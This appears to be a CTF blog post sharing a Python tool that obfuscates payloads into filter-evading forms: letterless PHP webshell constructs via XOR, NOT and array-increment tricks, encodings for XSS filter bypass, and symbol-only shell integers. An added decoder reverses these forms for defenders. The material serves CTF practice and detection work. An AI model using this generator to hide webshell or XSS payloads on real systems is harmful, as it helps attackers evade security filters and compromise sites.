Payload generator script (command execution, XSS, odd equivalent transformations, etc.)

A helper script for generating payloads

Hello everyone, long time no see, R1chm0nd is back again.

When solving CTF challenges you often need fairly complex payloads, and converting them by hand is slow, especially in command-execution challenges.
So I spent a little time writing a script that bundles the payloads used in P神's article 《一些不包含数字和字母的webshell》 (webshells that contain no digits or letters). Take it if you need it, and in the spirit of the Linux community, please keep extending it.
The code is as follows:
Running the .py file with no arguments prints the help text.

import sys
from getopt import getopt, GetoptError


def notx(payload):
    """Bitwise NOT of every byte, percent-encoded (for PHP's ~"..." form)."""
    return ''.join('%%%02x' % (~ord(x) & 0xff) for x in payload)


def _non_alnum(c):
    """Byte values P神's article allows: control characters and the
    punctuation between the digit, upper-case and lower-case letter ranges."""
    return 1 < c < 32 or 57 < c < 65 or 90 < c < 97


def xor(payload):
    """Two non-alphanumeric strings whose XOR equals the payload: ("a"^"b")."""
    a = ''
    b = ''
    for x in payload:
        for i in range(127):
            j = i ^ ord(x)
            if _non_alnum(i) and _non_alnum(j):
                a += '%%%02x' % i
                b += '%%%02x' % j
                break
        else:
            raise ValueError('no non-alphanumeric XOR pair for %r' % x)
    return '("' + a + '"^"' + b + '")'


def afa(payload):
    """Build the payload from PHP's Array-to-string cast and string increment.
    Incrementing from 'A' only reaches upper-case letters, so A-Z only."""
    if not payload or not all('A' <= x <= 'Z' for x in payload):
        raise ValueError('afa only supports upper-case letters A-Z')
    # "Array"[false] == "Array"[0] == 'A'
    retval = '$_=[];$_=@"$_";$_=$_[\'!\'==\'@\'];\n'
    for n, x in enumerate(payload):
        retval += '//' + x + '\n'
        # restart from 'A' for every letter, then ++ up to the target letter
        retval += '$__=$_;' + '$__++;' * (ord(x) - ord('A')) + '\n'
        retval += ('$___=$__;' if n == 0 else '$___.=$__;') + '\n'
    return retval


def xss(payload):
    """The same text as JavaScript String.fromCharCode and as HTML numeric entities."""
    js = 'String.fromCharCode(' + ','.join(str(ord(n)) for n in payload) + ')'
    html = ''.join('&#%d;' % ord(n) for n in payload)
    return js, html


def ints(payload):
    """Write a non-negative integer using only $ ( ) ~ in shell arithmetic."""
    try:
        n = int(payload)
    except (TypeError, ValueError):
        return 'Only integers, please.'
    if n < 0:
        return 'Only non-negative integers, please.'
    # $((~$(()))) is -1; n+1 copies concatenate to -(n+1), and the outer ~ yields n
    return '$((~$((' + '$((~$(())))' * (n + 1) + '))))'


def chrx(payload):
    """PHP-style chr() concatenation, e.g. chr(72).chr(105)."""
    return '.'.join('chr(%d)' % ord(x) for x in payload)


def help(payload):
    return r'''
    Here are the parameters that you can use to change your payload:

    1.--not     Change your payload into its bitwise complement and encode it as hex
    2.--xor     Generate two strings equal to your payload based on xor
    3.--afa     Generate strings equal to your payload based on the properties of PHP's arrays
    4.--xss     Generate two strings that may bypass XSS detection
    5.--chrx    Change your payload into PHP's style with ASCII
    6.--ints    Change the integer into chars that can be used in command execution (Linux terminal)'''


if __name__ == '__main__':
    search = {'--not': notx, '--xor': xor, '--afa': afa, '--xss': xss,
              '--chrx': chrx, '--ints': ints, '-h': help}
    try:
        opts, args = getopt(sys.argv[1:], 'h', ['not=', 'xor=', 'afa=', 'xss=', 'chrx=', 'ints='])
        opt, payload = opts[0]          # IndexError when no option was given
        print(search[opt](payload))
    except (GetoptError, IndexError):
        print(help(''))
    except ValueError as err:
        print(err)
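Seen from the defensive side, the same transformations have to be undone when reviewing a request log or a suspicious PHP/JS snippet. The following is an added example, not part of the original script, that decodes the text forms the script above emits (the XOR pair, the complement in its PHP `~"..."` usage, chr() chains, String.fromCharCode and HTML numeric entities) back to plaintext. The sample inputs are constructed and all spell "hello"; the decoder assumes the percent-encoded bytes have not been URL-decoded yet.

```python
import re
from urllib.parse import unquote_to_bytes

# Matchers for the encodings the generator emits. The XOR and NOT forms
# carry percent-encoded bytes, as they would appear in a request parameter.
PCT = r'(?:%[0-9a-fA-F]{2})+'
PATTERNS = {
    'xor': re.compile(r'\(\s*"(' + PCT + r')"\s*\^\s*"(' + PCT + r')"\s*\)'),
    'not': re.compile(r'~\s*"(' + PCT + r')"'),
    'chr': re.compile(r'(?:chr\(\d+\)\s*\.?\s*){2,}'),
    'fromcharcode': re.compile(r'String\.fromCharCode\([\d,\s]+\)'),
    'entity': re.compile(r'(?:&#\d+;){2,}'),
}


def decode_match(kind, m):
    """Recover the plaintext that one matched construct evaluates to."""
    if kind == 'xor':
        a = unquote_to_bytes(m.group(1))
        b = unquote_to_bytes(m.group(2))
        return bytes(x ^ y for x, y in zip(a, b)).decode('latin-1')
    if kind == 'not':
        return bytes(~x & 0xff for x in unquote_to_bytes(m.group(1))).decode('latin-1')
    # chr(), String.fromCharCode() and &#NN; all list decimal code points
    return ''.join(chr(int(n)) for n in re.findall(r'\d+', m.group(0)))


def reveal(text):
    """Return [(kind, plaintext)] for every obfuscated construct found in text."""
    found = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            found.append((kind, decode_match(kind, m)))
    return found


# Constructed samples in the shapes the script produces; each decodes to "hello"
SAMPLES = [
    '("%60%60%60%60%60"^"%08%05%0c%0c%0f")',
    '~"%97%9a%93%93%90"',
    'chr(104).chr(101).chr(108).chr(108).chr(111)',
    'String.fromCharCode(104,101,108,108,111)',
    '&#104;&#101;&#108;&#108;&#111;',
]

if __name__ == '__main__':
    for s in SAMPLES:
        print(s, '->', reveal(s))
```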
